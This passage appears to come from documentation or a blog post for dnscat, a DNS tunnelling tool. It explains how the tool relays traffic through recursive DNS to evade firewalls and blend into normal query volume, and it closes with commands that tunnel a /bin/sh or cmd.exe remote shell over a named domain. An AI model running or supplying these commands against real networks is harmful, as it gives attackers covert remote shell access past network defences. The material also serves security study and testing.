Communicating by DNS is great because the client only needs the ability to talk to a single DNS server, any DNS server on the Internet (with recursion enabled). dnscat will, by default, use the system DNS server, which should cover basically every case. Firewalls aren’t going to stop you from talking to your local DNS server, right? And I don’t know about the average network, but on ours there are thousands of DNS queries every minute, so a little bit of extra traffic just gets lost in the flow.
In brief, dnscat works by taking advantage of DNS recursion. It sends messages to the authoritative nameserver for a domain, which is the key — to be a server, you have to be the authoritative nameserver for a domain. For example, I’m the authoritative server for skullseclabs.org, so any requests that end with .skullseclabs.org, no matter where they originate, will eventually connect to 188.8.131.52 (my current address).
Example: Remote shell.
Typically, to tunnel a shell over DNS, you’re going to want to run a standard server as before:
dnscat –domain skullseclabs.org –exec “/bin/sh”
dnscat.exe –domain skullseclabs.org –exec “cmd.exe”